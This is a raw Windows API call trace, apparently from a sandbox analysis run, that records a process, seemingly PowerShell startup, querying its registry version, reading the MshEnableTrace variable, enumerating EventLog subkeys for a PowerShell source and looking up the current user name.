	[0288.720] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x0, lpValueName=0x262650, lpcchValueName=0x16d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.720] CoTaskMemFree (pv=0x262650) 
	[0288.720] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.720] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x1, lpValueName=0x262650, lpcchValueName=0x16d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.720] CoTaskMemFree (pv=0x262650) 
	[0288.720] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.720] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x2, lpValueName=0x262650, lpcchValueName=0x16d398, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d398, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.720] CoTaskMemFree (pv=0x262650) 
	[0288.720] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d37c, lpData=0x0, lpcbData=0x16d378*=0x0 | out: lpType=0x16d37c*=0x1, lpData=0x0, lpcbData=0x16d378*=0x8) returned 0x0
	[0288.720] CoTaskMemAlloc (cb=0xc) returned 0x2d78e0
	[0288.720] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d34c, lpData=0x2d78e0, lpcbData=0x16d348*=0x8 | out: lpType=0x16d34c*=0x1, lpData="2.0", lpcbData=0x16d348*=0x8) returned 0x0
	[0288.720] CoTaskMemFree (pv=0x2d78e0) 
	[0288.722] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.722] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.726] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0288.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.727] CoTaskMemFree (pv=0x2ca2e0) 
	[0288.732] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d418 | out: phkResult=0x16d418*=0x1cc) returned 0x0
	[0288.735] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d38c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d388, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d38c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d388*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.735] CoTaskMemFree (pv=0x0) 
	[0288.736] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.736] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x0, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.736] CoTaskMemFree (pv=0x262650) 
	[0288.736] CoTaskMemFree (pv=0x0) 
	[0288.736] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.736] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x1, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.736] CoTaskMemFree (pv=0x262650) 
	[0288.736] CoTaskMemFree (pv=0x0) 
	[0288.736] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.736] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x2, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.736] CoTaskMemFree (pv=0x262650) 
	[0288.736] CoTaskMemFree (pv=0x0) 
	[0288.736] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.736] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x3, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.736] CoTaskMemFree (pv=0x262650) 
	[0288.736] CoTaskMemFree (pv=0x0) 
	[0288.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.737] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x4, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.737] CoTaskMemFree (pv=0x262650) 
	[0288.737] CoTaskMemFree (pv=0x0) 
	[0288.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.737] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x5, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.737] CoTaskMemFree (pv=0x262650) 
	[0288.737] CoTaskMemFree (pv=0x0) 
	[0288.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.737] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x6, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.737] CoTaskMemFree (pv=0x262650) 
	[0288.737] CoTaskMemFree (pv=0x0) 
	[0288.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.737] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x7, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.737] CoTaskMemFree (pv=0x262650) 
	[0288.737] CoTaskMemFree (pv=0x0) 
	[0288.737] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0288.737] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x8, lpName=0x262650, lpcchName=0x16d418, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d418, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.737] CoTaskMemFree (pv=0x262650) 
	[0288.738] CoTaskMemFree (pv=0x0) 
	[0288.738] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x304) returned 0x0
	[0288.738] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.738] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x308) returned 0x0
	[0288.738] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.738] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x30c) returned 0x0
	[0288.738] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.738] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x320) returned 0x0
	[0288.738] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.738] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x338) returned 0x0
	[0288.738] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.739] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x33c) returned 0x0
	[0288.739] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.739] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x340) returned 0x0
	[0288.739] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.739] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x344) returned 0x0
	[0288.739] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x0) returned 0x2
	[0288.739] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x348) returned 0x0
	[0288.739] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d478 | out: phkResult=0x16d478*=0x34c) returned 0x0
	[0288.739] RegCloseKey (hKey=0x34c) returned 0x0
	[0288.740] RegCloseKey (hKey=0x1cc) returned 0x0
	[0288.741] RegCloseKey (hKey=0x348) returned 0x0
	[0289.393] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0289.393] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d688) returned 0x1
	[0289.394] CoTaskMemFree (pv=0x1b6d6480) 
	[0289.396] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0289.396] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0289.396] CoTaskMemFree (pv=0x262650) 
	[0290.169] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x350) returned 0x0
	[0290.169] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d33c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d338, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d33c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d338*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.169] CoTaskMemFree (pv=0x0) 
	[0290.169] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.169] CoTaskMemFree (pv=0x262650) 
	[0290.169] CoTaskMemFree (pv=0x0) 
	[0290.169] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.169] CoTaskMemFree (pv=0x262650) 
	[0290.170] CoTaskMemFree (pv=0x0) 
	[0290.170] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.170] CoTaskMemFree (pv=0x262650) 
	[0290.170] CoTaskMemFree (pv=0x0) 
	[0290.170] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.170] CoTaskMemFree (pv=0x262650) 
	[0290.170] CoTaskMemFree (pv=0x0) 
	[0290.170] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.170] CoTaskMemFree (pv=0x262650) 
	[0290.170] CoTaskMemFree (pv=0x0) 
	[0290.170] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.170] CoTaskMemFree (pv=0x262650) 
	[0290.170] CoTaskMemFree (pv=0x0) 
	[0290.170] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.171] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.171] CoTaskMemFree (pv=0x262650) 
	[0290.171] CoTaskMemFree (pv=0x0) 
	[0290.171] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.171] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.171] CoTaskMemFree (pv=0x262650) 
	[0290.171] CoTaskMemFree (pv=0x0) 
	[0290.171] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.171] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.171] CoTaskMemFree (pv=0x262650) 
	[0290.171] CoTaskMemFree (pv=0x0) 
	[0290.171] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x354) returned 0x0
	[0290.171] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.171] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x358) returned 0x0
	[0290.172] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.172] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x35c) returned 0x0
	[0290.172] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.172] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x360) returned 0x0
	[0290.172] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.172] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x364) returned 0x0
	[0290.172] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.172] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x368) returned 0x0
	[0290.173] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.173] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x36c) returned 0x0
	[0290.173] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.173] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x370) returned 0x0
	[0290.173] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.173] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x374) returned 0x0
	[0290.173] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x378) returned 0x0
	[0290.174] RegCloseKey (hKey=0x378) returned 0x0
	[0290.174] RegCloseKey (hKey=0x350) returned 0x0
	[0290.174] RegCloseKey (hKey=0x374) returned 0x0
	[0290.175] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x374) returned 0x0
	[0290.175] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d33c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d338, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d33c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d338*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.175] CoTaskMemFree (pv=0x0) 
	[0290.175] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.175] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.175] CoTaskMemFree (pv=0x262650) 
	[0290.175] CoTaskMemFree (pv=0x0) 
	[0290.175] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.175] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.175] CoTaskMemFree (pv=0x262650) 
	[0290.175] CoTaskMemFree (pv=0x0) 
	[0290.175] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.175] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.176] CoTaskMemFree (pv=0x262650) 
	[0290.176] CoTaskMemFree (pv=0x0) 
	[0290.176] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.176] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.176] CoTaskMemFree (pv=0x262650) 
	[0290.176] CoTaskMemFree (pv=0x0) 
	[0290.176] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.176] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.176] CoTaskMemFree (pv=0x262650) 
	[0290.176] CoTaskMemFree (pv=0x0) 
	[0290.176] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.176] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.176] CoTaskMemFree (pv=0x262650) 
	[0290.176] CoTaskMemFree (pv=0x0) 
	[0290.176] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.176] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.176] CoTaskMemFree (pv=0x262650) 
	[0290.176] CoTaskMemFree (pv=0x0) 
	[0290.177] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.177] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.177] CoTaskMemFree (pv=0x262650) 
	[0290.177] CoTaskMemFree (pv=0x0) 
	[0290.177] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0290.177] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x262650, lpcchName=0x16d3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.177] CoTaskMemFree (pv=0x262650) 
	[0290.177] CoTaskMemFree (pv=0x0) 
	[0290.177] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x350) returned 0x0
	[0290.177] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.177] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x378) returned 0x0
	[0290.177] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.178] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x37c) returned 0x0
	[0290.178] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.178] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x380) returned 0x0
	[0290.178] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
	[0290.178] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x384) returned 0x0
	[0290.178] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d428 | out: phkResult=0x16d428*=0x0) returned 0x2
